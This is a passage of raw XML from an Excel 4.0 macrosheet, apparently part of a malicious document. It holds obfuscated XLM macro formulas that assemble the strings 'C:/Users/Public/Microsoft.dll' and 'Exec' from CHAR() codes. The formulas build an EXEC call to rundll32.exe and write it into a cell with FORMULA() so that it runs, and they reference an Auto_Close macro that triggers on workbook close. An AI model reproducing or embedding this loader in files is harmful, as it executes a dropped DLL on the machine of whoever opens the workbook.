t="str"><f>CONCATENATE(CHAR(47),CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(115),CHAR(47),CHAR(80),CHAR(117),CHAR(98),CHAR(108),CHAR(105),CHAR(99),CHAR(47))</f><v>/Users/Public/</v></c></row><row r="476" spans="23:23"><c r="W476" s="1" t="str"><f>CONCATENATE(CHAR(77),CHAR(105),CHAR(99),CHAR(114),CHAR(111),CHAR(115),CHAR(111),CHAR(102),CHAR(116),CHAR(46),CHAR(100),CHAR(108),CHAR(108),CHAR(44))</f><v>Microsoft.dll,</v></c></row><row r="477" spans="23:23"><c r="W477" 
s="1" t="str"><f>CONCATENATE(CHAR(69),CHAR(120),CHAR(101),CHAR(99))</f><v>Exec</v></c></row><row r="478" spans="23:23"><c r="W478" s="1" t="str"><f>CONCATENATE(_xlnm.Auto_Close1,W475,W476,W477)</f><v>rundll32.exe C:/Users/Public/Microsoft.dll,Exec</v></c></row><row r="481" spans="23:23"><c r="W481" s="4" t="str"><f>CONCATENATE(MID("=",1,1),MID("E",1,1),MID("X",1,1),MID("E",1,1),MID("C",1,1),MID("(",1,1),CHAR(34))</f><v>=EXEC("</v></c></row><row r="482" spans="23:23"><c r="W482" s="4" t="str"><f>CONCATENATE(CHAR(34),MID(")",1,1))</f><v>")</v></c></row><row r="483" spans="23:23"><c r="W483" s="4" t="str"><f>CONCATENATE(W481,W478,W482)</f><v>=EXEC("rundll32.exe C:/Users/Public/Microsoft.dll,Exec")</v></c></row><row r="484" spans="23:23"><c r="W484" s="1" t="b"><f>FORMULA(W483,W573)</f><v>1</v></c></row><row r="573" spans="23:23"><c r="W573" s="1" t="s"><v>1</v></c></row><row r="574" spans="23:23"><c r="W574" s="1" t="b"><f>FORMULA("Done",W573)</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>